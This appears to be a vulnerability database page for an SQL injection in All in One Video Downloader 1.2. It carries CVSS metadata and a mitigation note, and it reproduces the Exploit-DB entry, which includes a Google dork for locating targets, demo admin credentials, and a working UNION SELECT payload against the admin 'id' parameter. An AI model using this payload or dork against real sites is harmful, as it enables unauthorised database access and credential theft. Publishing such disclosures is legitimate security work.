All in One Video Downloader 1.2 - SQL Injection

vendor:

All in One Video Downloader

by:

Deyaa Muhammad

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: All in One Video Downloader

Affected Version From: 1.2

Affected Version To: 1.2

Patch Exists: NO

Related CWE: N/A

CPE: a:niche_office:all_in_one_video_downloader

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: WIN7_x68/cloudflare

2019

All in One Video Downloader 1.2 – SQL Injection

All in One Video Downloader 1.2 is vulnerable to SQL Injection. An attacker can exploit this vulnerability to gain access to sensitive information such as user credentials, database name, and version. This vulnerability can be exploited by sending a maliciously crafted SQL query to the vulnerable parameter 'id' in the 'view=page-edit' page. The attacker can use the UNION SELECT statement to retrieve the sensitive information from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

# Exploit Title: All in One Video Downloader 1.2 - SQL Injection
# Google Dork: "developed by Niche Office"
# Date: 1 Jan 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# Vendor Homepage: https://nicheoffice.web.tr/
# Software Link: https://codecanyon.net/item/all-in-one-video-downloader-youtube-and-more/22599418
# Demo Website: https://aiovideodl.ml/
# Demo Admin Panel: https://aiovideodl.ml/admin/
# Demo Admin Credentials: demo@aiovideodl.ml/123456
# Version: 1.2
# Tested on: WIN7_x68/cloudflare
# CVE : N/A

# POC:
https://[PATH]/admin/?view=page-edit&id=2.9'+[SQLI]-- -

# Exploit:
https://[PATH]/admin/?view=page-edit&id=2.9'+UNION+SELECT+1,2,3,4,concat(user(),0x3a3a,database(),0x3a3a,version())-- -